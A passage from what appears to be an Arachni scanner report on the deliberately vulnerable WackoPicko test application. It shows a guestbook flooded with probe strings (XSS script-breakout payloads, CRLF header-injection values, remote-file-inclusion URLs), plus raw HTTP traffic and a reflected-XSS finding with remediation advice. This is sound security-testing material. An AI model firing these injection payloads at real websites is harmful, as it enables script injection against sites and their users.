	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt; </p>
		<p class="comment">1</p>
	<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
		<p class="comment">1</p>
	<p> - by arachni_name()&quot;&amp;%1'-;&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;' </p>
		<p class="comment">1</p>
	<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
		<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
	<p> - by arachni_name </p>
		<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
	<p> - by arachni_name </p>
		<p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p>
	<p> - by arachni_name </p>
		<p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
	<p> - by arachni_name </p>
		<p class="comment">1'"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name]]]]]]]]] </p>
		<p class="comment">1<!--</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name#^($!@$)(()))****** </p>
		<p class="comment">1</p>
	<p> - by arachni_name'&quot; </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;!-- </p>
		<p class="comment">1#^($!@$)(()))******</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1]]]]]]]]]</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   

Cross-Site Scripting (XSS) in script context 5 xss_script_context

Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction.

Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation.

If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS).

Arachni has discovered that it is possible to force the page to execute custom JavaScript code.

Remediation guidance

To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page.

Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc.

Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include:

  • &
  • <
  • >
  • "
  • '
  • /

An example of HTML entity encoding is converting < to &lt;.

Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed:

  1. Directly in a script.
  2. Inside an HTML comment.
  3. In an attribute name.
  4. In a tag name.
  5. Directly in CSS.

Each of these locations have their own form of escaping and filtering.

Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions.

Injected seed Proof
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
0
1
2
3
4
5
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
  <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
  </input>
  <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/ http://192.168.0.26/WackoPicko/pictures/search.php
query
query
</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
Transitions

Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.

# Time Event Element Options
0 0.839089 load page
URL http://192.168.0.26/WackoPicko/pictures/search.php?query=%3C/script%3E%3Cscript%3Ewindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%3C/script%3E
1 0.103703 request http://192.168.0.26/WackoPicko/pictures/search.php?query=%3C/script%3E%3Cscript%3Ewindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()%3C/script%3E
2 0.132022 request http://192.168.0.26/WackoPicko/css/stylings.php

Execution-flow sinks

Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.

# Data
0

No helper data logged.

Inspect

HTTP request

Raw HTTP request used to retrieve the page.


    
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:52 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 976
Content-Type: text/html

<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="&lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt;"/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
'</h2>

   <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
      <h3 class="error">No pictures here...</h3>


</ul>
</div>

</div>


       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="&lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt;">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
'</h2>

   <div class="column prepend-1 span-21 first last" style="margin-bottom: 2em;">
      <h3 class="error">No pictures here...</h3>



</div>

</div>


       <div class="column span-24 first last" id="footer">
        <ul>
